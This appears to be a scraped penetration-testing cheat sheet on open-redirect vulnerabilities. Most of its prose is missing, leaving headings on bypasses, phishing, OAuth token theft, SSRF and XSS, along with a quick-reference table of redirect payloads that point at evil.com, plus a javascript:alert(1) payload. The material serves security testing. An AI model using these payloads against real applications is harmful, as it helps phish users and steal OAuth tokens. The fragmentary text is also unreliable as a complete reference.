Overview
Application redirects user to attacker-controlled URL via unvalidated parameter. Used for phishing, OAuth token theft, and SSRF chain.Common Parameters
Detection
evil.com.
Bypass Techniques
Double URL Encoding
Using @ Symbol
user@host — actual destination is evil.com.
Backslash
Protocol-Relative
Subdomain Trick
Null Byte / Whitespace
CRLF Injection in Redirect
JavaScript Protocol
Data URI
Dot Bypass
Path Traversal
Exploitation
Phishing
OAuth Token Theft
SSRF Chain
If server-side follows redirect:XSS via javascript: Protocol
Automation
Fuzzing Parameters
With gf Patterns
Nuclei
Quick Reference
| Bypass | Payload |
|---|---|
| Basic | ?url=https://evil.com |
| @ trick | ?url=https://[email protected] |
| Protocol-relative | ?url=//evil.com |
| Subdomain | ?url=https://TARGET.evil.com |
| Backslash | ?url=//evil.com\@TARGET |
| Double encode | ?url=https%253A%252F%252Fevil.com |
| javascript: | ?url=javascript:alert(1) |